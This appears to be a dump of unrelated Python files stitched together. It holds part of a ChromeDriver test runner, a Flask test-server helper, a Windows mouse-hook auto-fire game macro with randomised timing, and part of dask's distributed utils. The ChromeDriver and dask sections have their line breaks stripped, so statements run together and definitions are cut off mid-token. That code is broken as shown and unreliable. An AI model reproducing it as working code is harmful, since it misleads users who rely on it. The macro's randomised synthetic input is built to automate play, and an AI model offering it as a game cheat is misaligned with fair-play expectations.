% port) driver.Quit() except: continue finally: if process.poll() is None: process.terminate() # Wait for Chrome to exit here to prevent a race with Chrome to # delete/modify the temporary user-data-dir. # Maximum wait ~1 second. for _ in range(20): if process.poll() is not None: break print('continuing to wait for Chrome to exit') time.sleep(.05) else: process.kill() break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. class LaunchDesktopTest(ChromeDriverBaseTest): """Tests that launching desktop Chrome works.""" def testExistingDevToolsPortFile(self): """If a DevTools port file already exists before startup, then we should ignore it and get our debug port number from the new file.""" user_data_dir = tempfile.mkdtemp() try: dev_tools_port_file = os.path.join(user_data_dir, 'DevToolsActivePort') with open(dev_tools_port_file, 'w') as fd: fd.write('34\n/devtools/browser/2dab5fb1-5571-40d8-a6ad-98823bc5ff84') driver = self.CreateDriver( chrome_switches=['user-data-dir=' + user_data_dir]) with open(dev_tools_port_file, 'r') as fd: port = int(fd.readlines()[0]) # Ephemeral ports are always high numbers. self.assertTrue(port > 100) finally: shutil.rmtree(user_data_dir, ignore_errors=True) def testHelpfulErrorMessage_NormalExit(self): """If Chrome fails to start, we should provide a useful error message.""" if util.IsWindows(): # Not bothering implementing a Windows test since then I would have # to implement Windows-specific code for a program that quits and ignores # any arguments. Linux and Mac should be good enough coverage. 
return file_descriptor, path = tempfile.mkstemp() try: os.write(file_descriptor, '#!/bin/bash\nexit 0') os.close(file_descriptor) os.chmod(path, 0o777) exception_raised = False try: driver = chromedriver.ChromeDriver(_CHROMEDRIVER_SERVER_URL, _CHROMEDRIVER_SERVER_PID, chrome_binary=path, test_name=self.id()) except Exception as e: self.assertIn('Chrome failed to start', e.message) self.assertIn('exited normally', e.message) self.assertIn('ChromeDriver is assuming that Chrome has crashed', e.message) exception_raised = True self.assertTrue(exception_raised) try: driver.Quit() except: pass finally: pass os.remove(path) def testNoBinaryErrorMessage(self): temp_dir = tempfile.mkdtemp() exception_raised = False try: driver = chromedriver.ChromeDriver( _CHROMEDRIVER_SERVER_URL, _CHROMEDRIVER_SERVER_PID, chrome_binary=os.path.join(temp_dir, 'this_file_should_not_exist'), test_name=self.id()) except Exception as e: self.assertIn('no chrome binary', e.message) exception_raised = True finally: shutil.rmtree(temp_dir) self.assertTrue(exception_raised) class PerfTest(ChromeDriverBaseTest): """Tests for ChromeDriver perf.""" def _RunDriverPerfTest(self, name, test_func): """Runs a perf test ChromeDriver server. Args: name: The name of the perf test. test_func: Called with the server url to perform the test action. Must return the time elapsed. """ result = [] for iteration in range(10): result += [test_func(_CHROMEDRIVER_SERVER_URL)] def PrintResult(result): mean = sum(result) / len(result) avg_dev = sum([abs(sample - mean) for sample in result]) / len(result) print('perf result', name, mean, avg_dev, result) util.AddBuildStepText('%s: %.3f+-%.3f' % ( name, mean, avg_dev)) # Discard first result, which may be off due to cold start. 
PrintResult(result[1:]) def testSessionStartTime(self): def Run(url): start = monotonic() driver = self.CreateDriver(url) end = monotonic() driver.Quit() return end - start self._RunDriverPerfTest('session start', Run) def testSessionStopTime(self): def Run(url): driver = self.CreateDriver(url) start = monotonic() driver.Quit() end = monotonic() return end - start self._RunDriverPerfTest('session stop', Run) def testColdExecuteScript(self): def Run(url): driver = self.CreateDriver(url) start = monotonic() driver.ExecuteScript('return 1') end = monotonic() driver.Quit() return end - start self._RunDriverPerfTest('cold exe js', Run) class HeadlessInvalidCertificateTest(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver.""" @staticmethod def GetHttpsUrlForFile(file_path): return ( HeadlessInvalidCertificateTest._https_server.GetUrl() + file_path) def setUp(self): self._driver = self.CreateDriver(chrome_switches = ["--headless"], accept_insecure_certs = True) def testLoadsPage(self): print("loading") self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html')) # Verify that page content loaded. self._driver.FindElement('css selector', '#link') def testNavigateNewWindow(self): print("loading") self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html')) self._driver.ExecuteScript( 'document.getElementById("link").href = "page_test.html";') old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) # Verify that page content loaded in new window. 
self._driver.FindElement('css selector', '#link') class HeadlessChromeDriverTest(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver.""" def setUp(self): self._driver = self.CreateDriver(chrome_switches=['--headless']) def _newWindowDoesNotFocus(self, window_type='window'): current_handles = self._driver.GetWindowHandles() self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/focus_blur_test.html')) new_window = self._driver.NewWindow(window_type=window_type) text = self._driver.FindElement('css selector', '#result').GetText() self.assertTrue(new_window['handle'] not in current_handles) self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles()) self.assertEquals(text, 'PASS') def testNewWindowDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='window') def testNewTabDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='tab') def testWindowFullScreen(self): old_rect_list = self._driver.GetWindowRect() # Testing the resulting screensize doesn't work in headless, because there # is no screen to give a size. # We just want to ensure this command doesn't timeout or error. 
self._driver.FullScreenWindow() # Restore a known size so next tests won't fail self._driver.SetWindowRect(*old_rect_list) def testPrintHeadless(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) pdf = self._driver.PrintPDF({ 'orientation': 'landscape', 'scale': 1.1, 'margin': { 'top': 1.1, 'bottom': 2.2, 'left': 3.3, 'right': 4.4 }, 'background': True, 'shrinkToFit': False, 'pageRanges': [1], 'page': { 'width': 15.6, 'height': 20.6 } }) decoded_pdf = base64.b64decode(pdf) self.assertTrue(decoded_pdf.startswith("%PDF")) self.assertTrue(decoded_pdf.endswith("%%EOF")) def testPrintInvalidArgumentHeadless(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self.assertRaises(chromedriver.InvalidArgument, self._driver.PrintPDF, {'pageRanges': ['x-y']}) class SupportIPv4AndIPv6(ChromeDriverBaseTest): def testSupportIPv4AndIPv6(self): has_ipv4 = False has_ipv6 = False for info in socket.getaddrinfo('localhost', 0): if info[0] == socket.AF_INET: has_ipv4 = True if info[0] == socket.AF_INET6: has_ipv6 = True if has_ipv4: self.CreateDriver("http://127.0.0.1:" + str(chromedriver_server.GetPort())) if has_ipv6: self.CreateDriver('http://[::1]:' + str(chromedriver_server.GetPort())) class JavaScriptTests(ChromeDriverBaseTestWithWebServer): def GetFileUrl(self, filename): return 'file://' + self.js_root + filename def setUp(self): self._driver = self.CreateDriver() self.js_root = os.path.dirname(os.path.realpath(__file__)) + '/../js/' self._driver.SetWindowRect(640, 480, 0, 0) def checkTestResult(self): def getStatus(): return self._driver.ExecuteScript('return window.CDCJStestRunStatus') self.WaitForCondition(getStatus) self.assertEquals('PASS', getStatus()) def testAllJS(self): self._driver.Load(self.GetFileUrl('call_function_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('dispatch_touch_event_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('execute_async_script_test.html')) 
self.checkTestResult() self._driver.Load(self.GetFileUrl('execute_script_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('get_element_location_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('get_element_region_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('is_option_element_toggleable_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('focus_test.html')) self.checkTestResult() # 'Z' in the beginning is to make test executed in the end of suite. class ZChromeStartRetryCountTest(unittest.TestCase): def testChromeStartRetryCount(self): self.assertEquals(0, chromedriver.ChromeDriver.retry_count, "Chrome was retried to start during suite execution " "in following tests:\n" + ', \n'.join(chromedriver.ChromeDriver.retried_tests)) if __name__ == '__main__': parser = optparse.OptionParser() parser.add_option( '', '--chromedriver', help='Path to chromedriver server (REQUIRED!)') parser.add_option( '', '--log-path', help='Output verbose server logs to this file') parser.add_option( '', '--replayable', help="Don't truncate long strings in the log so that the log can be " "replayed.") parser.add_option( '', '--chrome', help='Path to a build of the chrome binary') parser.add_option( '', '--filter', type='string', default='', help='Filter for specifying what tests to run, \"*\" will run all,' 'including tests excluded by default. E.g., *testRunMethod') parser.add_option( '', '--android-package', help=('Android package key. Possible values: ' + str(list(_ANDROID_NEGATIVE_FILTER.keys())))) parser.add_option( '', '--isolated-script-test-output', help='JSON output file used by swarming') parser.add_option( '', '--test-type', help='Select type of tests to run. 
Possible value: integration') options, args = parser.parse_args() if options.chromedriver is None: parser.error('--chromedriver is required.\n' + 'Please run "%s --help" for help' % __file__) options.chromedriver = util.GetAbsolutePathOfUserPath(options.chromedriver) if (not os.path.exists(options.chromedriver) and util.GetPlatformName() == 'win' and not options.chromedriver.lower().endswith('.exe')): options.chromedriver = options.chromedriver + '.exe' if not os.path.exists(options.chromedriver): parser.error('Path given by --chromedriver is invalid.\n' + 'Please run "%s --help" for help' % __file__) if options.replayable and not options.log_path: parser.error('Need path specified when replayable log set to true.') # When running in commit queue & waterfall, minidump will need to write to # same directory as log, so use the same path global _MINIDUMP_PATH if options.log_path: _MINIDUMP_PATH = os.path.dirname(options.log_path) global _CHROMEDRIVER_BINARY _CHROMEDRIVER_BINARY = util.GetAbsolutePathOfUserPath(options.chromedriver) if (options.android_package and options.android_package not in _ANDROID_NEGATIVE_FILTER): parser.error('Invalid --android-package') global chromedriver_server chromedriver_server = server.Server(_CHROMEDRIVER_BINARY, options.log_path, replayable=options.replayable) global _CHROMEDRIVER_SERVER_PID _CHROMEDRIVER_SERVER_PID = chromedriver_server.GetPid() global _CHROMEDRIVER_SERVER_URL _CHROMEDRIVER_SERVER_URL = chromedriver_server.GetUrl() global _CHROME_BINARY if options.chrome: _CHROME_BINARY = util.GetAbsolutePathOfUserPath(options.chrome) else: # In some test environments (such as commit queue), it's not convenient to # specify Chrome binary location on the command line. Try to use heuristics # to locate the Chrome binary next to the ChromeDriver binary. 
driver_path = os.path.dirname(_CHROMEDRIVER_BINARY) chrome_path = None platform = util.GetPlatformName() if platform == 'linux': chrome_path = os.path.join(driver_path, 'chrome') elif platform == 'mac': if os.path.exists(os.path.join(driver_path, 'Google Chrome.app')): chrome_path = os.path.join(driver_path, 'Google Chrome.app', 'Contents', 'MacOS', 'Google Chrome') else: chrome_path = os.path.join(driver_path, 'Chromium.app', 'Contents', 'MacOS', 'Chromium') elif platform == 'win': chrome_path = os.path.join(driver_path, 'chrome.exe') if chrome_path is not None and os.path.exists(chrome_path): _CHROME_BINARY = chrome_path else: _CHROME_BINARY = None global _ANDROID_PACKAGE_KEY _ANDROID_PACKAGE_KEY = options.android_package if _ANDROID_PACKAGE_KEY: devil_chromium.Initialize() if options.filter == '': if _ANDROID_PACKAGE_KEY: negative_filter = _ANDROID_NEGATIVE_FILTER[_ANDROID_PACKAGE_KEY] else: negative_filter = _GetDesktopNegativeFilter() if options.test_type is not None: if options.test_type == 'integration': negative_filter += _INTEGRATION_NEGATIVE_FILTER else: parser.error('Invalid --test-type. 
Valid value: integration') options.filter = '*-' + ':__main__.'.join([''] + negative_filter) all_tests_suite = unittest.defaultTestLoader.loadTestsFromModule( sys.modules[__name__]) test_suite = unittest_util.FilterTestSuite(all_tests_suite, options.filter) test_suites = [test_suite] ChromeDriverBaseTestWithWebServer.GlobalSetUp() runner = unittest.TextTestRunner( stream=sys.stdout, descriptions=False, verbosity=2, resultclass=unittest_util.AddSuccessTextTestResult) result = runner.run(test_suite) results = [result] num_failed = len(result.failures) + len(result.errors) # Limit fail tests to 10 to avoid real bug causing many tests to fail # Only enable retry for automated bot test if (num_failed > 0 and num_failed <= 10 and options.test_type == 'integration'): retry_test_suite = unittest.TestSuite() for f in result.failures: retry_test_suite.addTest(f[0]) for e in result.errors: retry_test_suite.addTest(e[0]) test_suites.append(retry_test_suite) print('\nRetrying failed tests\n') retry_result = runner.run(retry_test_suite) results.append(retry_result) ChromeDriverBaseTestWithWebServer.GlobalTearDown() if options.isolated_script_test_output: util.WriteResultToJSONFile(test_suites, results, options.isolated_script_test_output) util.TryUploadingResultToResultSink(results) sys.exit(len(results[-1].failures) + len(results[-1].errors))
__init__.py
from __future__ import absolute_import, print_function

import multiprocessing
import time

from flask import Flask

__all__ = ('create_app', 'BackgroundServerWrapper')


def create_app(name='butts', debug=False):
    """Build a minimal Flask app with two fixed routes.

    Args:
        name: Import name passed to the ``Flask`` constructor.
        debug: Whether to enable Flask debug mode.

    Returns:
        A configured :class:`flask.Flask` serving ``/`` -> ``"INDEX"``
        and ``/yow`` -> ``"YOW"``.
    """
    app = Flask(name)
    app.debug = debug
    app.add_url_rule('/', 'index', lambda: "INDEX")
    app.add_url_rule('/yow', 'yow', lambda: "YOW")
    return app


def _run_app(app, port):
    """Process entry point: run *app* blocking on *port*.

    Defined at module level (instead of the original lambda) so the target
    is picklable under the 'spawn' start method used on Windows/macOS.
    """
    app.run(port=port)


class BackgroundServerWrapper(object):
    """Wraps a flask application and allows it to be run in the background."""

    def __init__(self, app, port=5000):
        # app: the Flask application to serve.
        # port: TCP port the child process will bind.
        self.app = app
        self.port = port
        self._process = multiprocessing.Process(
            target=_run_app,
            args=(self.app, self.port)
        )

    def start_server(self, startup_wait=1.0):
        """Start the server process and give it time to begin listening.

        Args:
            startup_wait: Seconds to sleep after starting the child so it
                has a chance to bind its socket before callers connect.
                Defaults to the original fixed 1-second wait.
        """
        self._process.start()
        time.sleep(startup_wait)

    def stop_server(self):
        """Terminate the server process, if running, and reap it.

        The original checked ``if self._process:`` — a Process object is
        always truthy, and calling ``terminate()`` on a never-started
        process raises.  ``is_alive()`` is False both before ``start()``
        and after exit, so this is safe at any point in the lifecycle.
        """
        if self._process.is_alive():
            self._process.terminate()
            # join() reaps the child and avoids leaving a zombie process.
            self._process.join()
keyboardListener.py
# -*- coding: utf-8 -*-
"""Auto-fire macro (Windows only).

Installs low-level mouse hooks via pyHook and counts left-button press and
release events.  A background thread watches those counters and, while the
button is held down (press count != release count), replays a randomized
fire/weapon-switch key sequence with win32api synthetic input.

Requires pywin32 (win32api/win32con), pyHook and pythoncom.
"""
import pythoncom
import pyHook
import win32api
import win32con
import time
import threading
import random

# Windows virtual-key codes keyed by a human-readable name.
# Values follow the Win32 "Virtual-Key Codes" reference.
VK_CODE = {
    'backspace': 0x08, 'tab': 0x09, 'clear': 0x0C, 'enter': 0x0D,
    'shift': 0x10, 'ctrl': 0x11, 'alt': 0x12, 'pause': 0x13,
    'caps_lock': 0x14, 'esc': 0x1B, 'spacebar': 0x20,
    'page_up': 0x21, 'page_down': 0x22, 'end': 0x23, 'home': 0x24,
    'left_arrow': 0x25, 'up_arrow': 0x26, 'right_arrow': 0x27,
    'down_arrow': 0x28, 'select': 0x29, 'print': 0x2A, 'execute': 0x2B,
    'print_screen': 0x2C, 'ins': 0x2D, 'del': 0x2E, 'help': 0x2F,
    '0': 0x30, '1': 0x31, '2': 0x32, '3': 0x33, '4': 0x34,
    '5': 0x35, '6': 0x36, '7': 0x37, '8': 0x38, '9': 0x39,
    'a': 0x41, 'b': 0x42, 'c': 0x43, 'd': 0x44, 'e': 0x45,
    'f': 0x46, 'g': 0x47, 'h': 0x48, 'i': 0x49, 'j': 0x4A,
    'k': 0x4B, 'l': 0x4C, 'm': 0x4D, 'n': 0x4E, 'o': 0x4F,
    'p': 0x50, 'q': 0x51, 'r': 0x52, 's': 0x53, 't': 0x54,
    'u': 0x55, 'v': 0x56, 'w': 0x57, 'x': 0x58, 'y': 0x59, 'z': 0x5A,
    'numpad_0': 0x60, 'numpad_1': 0x61, 'numpad_2': 0x62,
    'numpad_3': 0x63, 'numpad_4': 0x64, 'numpad_5': 0x65,
    'numpad_6': 0x66, 'numpad_7': 0x67, 'numpad_8': 0x68,
    'numpad_9': 0x69,
    'multiply_key': 0x6A, 'add_key': 0x6B, 'separator_key': 0x6C,
    'subtract_key': 0x6D, 'decimal_key': 0x6E, 'divide_key': 0x6F,
    'F1': 0x70, 'F2': 0x71, 'F3': 0x72, 'F4': 0x73, 'F5': 0x74,
    'F6': 0x75, 'F7': 0x76, 'F8': 0x77, 'F9': 0x78, 'F10': 0x79,
    'F11': 0x7A, 'F12': 0x7B, 'F13': 0x7C, 'F14': 0x7D, 'F15': 0x7E,
    'F16': 0x7F, 'F17': 0x80, 'F18': 0x81, 'F19': 0x82, 'F20': 0x83,
    'F21': 0x84, 'F22': 0x85, 'F23': 0x86, 'F24': 0x87,
    'num_lock': 0x90, 'scroll_lock': 0x91,
    # NOTE(review): 'right_shift ' carries a trailing space in the
    # original data; preserved so existing lookups keep working.
    'left_shift': 0xA0, 'right_shift ': 0xA1,
    'left_control': 0xA2, 'right_control': 0xA3,
    'left_menu': 0xA4, 'right_menu': 0xA5,
    'browser_back': 0xA6, 'browser_forward': 0xA7,
    'browser_refresh': 0xA8, 'browser_stop': 0xA9,
    'browser_search': 0xAA, 'browser_favorites': 0xAB,
    'browser_start_and_home': 0xAC,
    'volume_mute': 0xAD, 'volume_Down': 0xAE, 'volume_up': 0xAF,
    'next_track': 0xB0, 'previous_track': 0xB1, 'stop_media': 0xB2,
    'play/pause_media': 0xB3, 'start_mail': 0xB4, 'select_media': 0xB5,
    'start_application_1': 0xB6, 'start_application_2': 0xB7,
    'attn_key': 0xF6, 'crsel_key': 0xF7, 'exsel_key': 0xF8,
    'play_key': 0xFA, 'zoom_key': 0xFB, 'clear_key': 0xFE,
    '+': 0xBB, ',': 0xBC, '-': 0xBD, '.': 0xBE, '/': 0xBF,
    '`': 0xC0, ';': 0xBA, '[': 0xDB, '\\': 0xDC, ']': 0xDD, "'": 0xDE,
    # The original literal repeated '`': 0xC0 a second time with the same
    # value; the duplicate entry has been dropped (no behavior change).
}


def key_press(key=''):
    """Send key-down event(s) for *key*.

    A one-character string presses that key.  A longer string is treated
    character-by-character (each character looked up as its own key name),
    so multi-character names like 'enter' cannot be passed as a plain
    string — pass a list/tuple of names instead (new, backward-compatible).

    Raises:
        KeyError: if a name is not present in VK_CODE.
    """
    if isinstance(key, (list, tuple)):
        for name in key:
            win32api.keybd_event(VK_CODE[name], 0, 0, 0)
        return
    if key != '' and isinstance(key, str):
        if len(key) == 1:
            win32api.keybd_event(VK_CODE[key], 0, 0, 0)
            print('press key down:%s' % VK_CODE[key])
        else:
            for x in key:
                win32api.keybd_event(VK_CODE[x], 0, 0, 0)


def key_up(key=''):
    """Send key-up event(s) for *key*; mirrors :func:`key_press`."""
    if isinstance(key, (list, tuple)):
        for name in key:
            win32api.keybd_event(VK_CODE[name], 0, win32con.KEYEVENTF_KEYUP, 0)
        return
    if key != '' and isinstance(key, str):
        if len(key) == 1:
            win32api.keybd_event(VK_CODE[key], 0, win32con.KEYEVENTF_KEYUP, 0)
            print('press key up:%s' % VK_CODE[key])
        else:
            for x in key:
                win32api.keybd_event(VK_CODE[x], 0, win32con.KEYEVENTF_KEYUP, 0)


def send_click():
    """Background worker loop.

    While the left button is held (down_num != up_num, maintained by the
    mouse hooks), emit a synthetic left-click held for a randomized burst,
    then tap '2' and '1' (weapon switch) with randomized pauses.
    """
    global down_num, up_num
    while True:
        if down_num != up_num:
            win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
            # How long to hold the trigger; roughly one shot per 0.1 s.
            time.sleep(random.uniform(0.38, 0.42))
            win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
            # Pause between bursts.
            time.sleep(random.uniform(0.25, 0.29))
            key_press('2')
            key_up('2')
            time.sleep(random.uniform(0.38, 0.56))
            key_press('1')
            key_up('1')
            print('click ok')
        else:
            # Bug fix: the original spun without sleeping while idle,
            # pegging a CPU core.  Yield briefly between polls.
            time.sleep(0.01)


def onMouse_leftdown(event):
    """Hook callback for left-button-down: count the press."""
    global down_num
    down_num += 1
    print("left DOWN DOWN" + str(down_num))
    # True lets the event propagate to other handlers; False would block it.
    return True


def onMouse_leftup(event):
    """Hook callback for left-button-up: count the release."""
    global up_num
    up_num += 1
    print("left UP UP UP" + str(up_num))
    return True


def keybord_1(event):
    # Placeholder keyboard handler; intentionally a no-op.
    pass


def main():
    """Install the mouse hooks and pump Windows messages forever."""
    hm = pyHook.HookManager()
    hm.MouseLeftDown = onMouse_leftdown
    hm.MouseLeftUp = onMouse_leftup
    hm.HookMouse()
    # Blocks until the process is killed; hook callbacks run from here.
    pythoncom.PumpMessages()


if __name__ == "__main__":
    down_num = 0
    up_num = 0
    print('thread %s is running...' % threading.current_thread().name)
    # daemon=True (fix): the original non-daemon thread kept the process
    # alive even after the message pump exited.
    t = threading.Thread(target=send_click, name='sendThread', daemon=True)
    t.start()
    main()
utils.py
# NOTE(review): lines below are a chunk of dask's distributed/utils.py whose
# physical line breaks were lost in extraction; several statements are
# collapsed onto a few very long lines, with definitions cut mid-token at the
# chunk boundaries.  Code is kept token-identical pending a proper re-flow.
# Contents: module imports, multiprocessing-context setup, has_arg,
# get_fileno_limit, IP/interface helpers, ignore_exceptions, All and Any.
import asyncio from asyncio import TimeoutError import atexit import click from collections import deque, OrderedDict, UserDict from concurrent.futures import ThreadPoolExecutor, CancelledError # noqa: F401 from contextlib import contextmanager, suppress import functools from hashlib import md5 import html import json import logging import multiprocessing import os import re import shutil import socket from time import sleep import importlib from importlib.util import cache_from_source import inspect import sys import tempfile import threading import warnings import weakref import pkgutil import base64 import tblib.pickling_support import xml.etree.ElementTree try: import resource except ImportError: resource = None import dask from dask import istask # provide format_bytes here for backwards compatibility from dask.utils import ( # noqa format_bytes, funcname, format_time, parse_bytes, parse_timedelta, ) import tlz as toolz from tornado import gen from tornado.ioloop import IOLoop try: from tornado.ioloop import PollIOLoop except ImportError: PollIOLoop = None # dropped in tornado 6.0 from .compatibility import PYPY, WINDOWS, get_running_loop from .metrics import time try: from dask.context import thread_state except ImportError: thread_state = threading.local() logger = _logger = logging.getLogger(__name__) no_default = "__no_default__" def _initialize_mp_context(): if WINDOWS or PYPY: return multiprocessing else: method = dask.config.get("distributed.worker.multiprocessing-method") ctx = multiprocessing.get_context(method) # Makes the test suite much faster preload = ["distributed"] if "pkg_resources" in sys.modules: preload.append("pkg_resources") from .versions import required_packages, optional_packages for pkg, _ in required_packages + optional_packages: try: importlib.import_module(pkg) except ImportError: pass else: preload.append(pkg) ctx.set_forkserver_preload(preload) return ctx mp_context = _initialize_mp_context() def has_arg(func, argname): """ 
Whether the function takes an argument with the given name. """ while True: try: if argname in inspect.getfullargspec(func).args: return True except TypeError: break try: # For Tornado coroutines and other decorated functions func = func.__wrapped__ except AttributeError: break return False def get_fileno_limit(): """ Get the maximum number of open files per process. """ if resource is not None: return resource.getrlimit(resource.RLIMIT_NOFILE)[0] else: # Default ceiling for Windows when using the CRT, though it # is settable using _setmaxstdio(). return 512 @toolz.memoize def _get_ip(host, port, family): # By using a UDP socket, we don't actually try to connect but # simply select the local address through which *host* is reachable. sock = socket.socket(family, socket.SOCK_DGRAM) try: sock.connect((host, port)) ip = sock.getsockname()[0] return ip except EnvironmentError as e: warnings.warn( "Couldn't detect a suitable IP address for " "reaching %r, defaulting to hostname: %s" % (host, e), RuntimeWarning, ) addr_info = socket.getaddrinfo( socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP )[0] return addr_info[4][0] finally: sock.close() def get_ip(host="8.8.8.8", port=80): """ Get the local IP address through which the *host* is reachable. *host* defaults to a well-known Internet host (one of Google's public DNS servers). """ return _get_ip(host, port, family=socket.AF_INET) def get_ipv6(host="2001:4860:4860::8888", port=80): """ The same as get_ip(), but for IPv6. """ return _get_ip(host, port, family=socket.AF_INET6) def get_ip_interface(ifname): """ Get the local IPv4 address of a network interface. KeyError is raised if the interface doesn't exist. ValueError is raised if the interface does no have an IPv4 address associated with it. """ import psutil net_if_addrs = psutil.net_if_addrs() if ifname not in net_if_addrs: allowed_ifnames = list(net_if_addrs.keys()) raise ValueError( "{!r} is not a valid network interface. 
" "Valid network interfaces are: {}".format(ifname, allowed_ifnames) ) for info in net_if_addrs[ifname]: if info.family == socket.AF_INET: return info.address raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,)) # FIXME: this breaks if changed to async def... @gen.coroutine def ignore_exceptions(coroutines, *exceptions): """ Process list of coroutines, ignoring certain exceptions >>> coroutines = [cor(...) for ...] # doctest: +SKIP >>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP """ wait_iterator = gen.WaitIterator(*coroutines) results = [] while not wait_iterator.done(): with suppress(*exceptions): result = yield wait_iterator.next() results.append(result) raise gen.Return(results) async def All(args, quiet_exceptions=()): """ Wait on many tasks at the same time Err once any of the tasks err. See https://github.com/tornadoweb/tornado/issues/1546 Parameters ---------- args: futures to wait for quiet_exceptions: tuple, Exception Exception types to avoid logging if they fail """ tasks = gen.WaitIterator(*map(asyncio.ensure_future, args)) results = [None for _ in args] while not tasks.done(): try: result = await tasks.next() except Exception: @gen.coroutine def quiet(): """ Watch unfinished tasks Otherwise if they err they get logged in a way that is hard to control. They need some other task to watch them so that they are not orphaned """ for task in list(tasks._unfinished): try: yield task except quiet_exceptions: pass quiet() raise results[tasks.current_index] = result return results async def Any(args, quiet_exceptions=()): """ Wait on many tasks at the same time and return when any is finished Err once any of the tasks err. 
Parameters ---------- args: futures to wait for quiet_exceptions: tuple, Exception Exception types to avoid logging if they fail """ tasks = gen.WaitIterator(*map(asyncio.ensure_future, args)) results = [None for _ in args] while not tasks.done(): try: result = await tasks.next() except Exception: @gen.coroutine def quiet(): """ Watch unfinished tasks Otherwise if they err they get logged in a way that is hard to control. They need some other task to watch them so that they are not orphaned """ for task in list(tasks._unfinished): try: yield task except quiet_exceptions: pass quiet() raise results[tasks.current_index] = result break return results def sync(loop, func, *args, callback_timeout=None, **kwargs): """ Run coroutine in loop running in separate thread. """ # Tornado's PollIOLoop doesn't raise when using closed, do it ourselves if PollIOLoop and ( (isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False)) or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed) ): raise RuntimeError("IOLoop is closed") try: if loop.asyncio_loop.is_closed(): # tornado 6 raise RuntimeError("IOLoop is closed") except AttributeError: pass e = threading.Event() main_tid = threading.get_ident() result = [None] error = [False] @gen.coroutine def f(): try: if main_tid == threading.get_ident(): raise RuntimeError("sync() called from thread of running loop") yield gen.moment thread_state.asynchronous = True future = func(*args, **kwargs) if callback_timeout is not None: future = asyncio.wait_for(future, callback_timeout) result[0] = yield future except Exception as exc: error[0] = sys.exc_info() finally: thread_state.asynchronous = False e.set() loop.add_callback(f) if callback_timeout is not None: if not e.wait(callback_timeout): raise TimeoutError("timed out after %s s." 
# NOTE(review): continuation of the extraction-mangled distributed/utils.py
# chunk (see note above the imports): tail of sync(), the LoopRunner class
# (thread-hosted IOLoop lifecycle), set_thread_state, tmp_text, clear_queue,
# is_kernel, and the key_split helpers.  Tokens kept byte-identical.
% (callback_timeout,)) else: while not e.is_set(): e.wait(10) if error[0]: typ, exc, tb = error[0] raise exc.with_traceback(tb) else: return result[0] class LoopRunner: """ A helper to start and stop an IO loop in a controlled way. Several loop runners can associate safely to the same IO loop. Parameters ---------- loop: IOLoop (optional) If given, this loop will be re-used, otherwise an appropriate one will be looked up or created. asynchronous: boolean (optional, default False) If false (the default), the loop is meant to run in a separate thread and will be started if necessary. If true, the loop is meant to run in the thread this object is instantiated from, and will not be started automatically. """ # All loops currently associated to loop runners _all_loops = weakref.WeakKeyDictionary() _lock = threading.Lock() def __init__(self, loop=None, asynchronous=False): current = IOLoop.current() if loop is None: if asynchronous: self._loop = current else: # We're expecting the loop to run in another thread, # avoid re-using this thread's assigned loop self._loop = IOLoop() self._should_close_loop = True else: self._loop = loop self._should_close_loop = False self._asynchronous = asynchronous self._loop_thread = None self._started = False with self._lock: self._all_loops.setdefault(self._loop, (0, None)) def start(self): """ Start the IO loop if required. The loop is run in a dedicated thread. If the loop is already running, this method does nothing. 
""" with self._lock: self._start_unlocked() def _start_unlocked(self): assert not self._started count, real_runner = self._all_loops[self._loop] if self._asynchronous or real_runner is not None or count > 0: self._all_loops[self._loop] = count + 1, real_runner self._started = True return assert self._loop_thread is None assert count == 0 loop_evt = threading.Event() done_evt = threading.Event() in_thread = [None] start_exc = [None] def loop_cb(): in_thread[0] = threading.current_thread() loop_evt.set() def run_loop(loop=self._loop): loop.add_callback(loop_cb) try: loop.start() except Exception as e: start_exc[0] = e finally: done_evt.set() thread = threading.Thread(target=run_loop, name="IO loop") thread.daemon = True thread.start() loop_evt.wait(timeout=10) self._started = True actual_thread = in_thread[0] if actual_thread is not thread: # Loop already running in other thread (user-launched) done_evt.wait(5) if not isinstance(start_exc[0], RuntimeError): if not isinstance( start_exc[0], Exception ): # track down infrequent error raise TypeError("not an exception", start_exc[0]) raise start_exc[0] self._all_loops[self._loop] = count + 1, None else: assert start_exc[0] is None, start_exc self._loop_thread = thread self._all_loops[self._loop] = count + 1, self def stop(self, timeout=10): """ Stop and close the loop if it was created by us. Otherwise, just mark this object "stopped". 
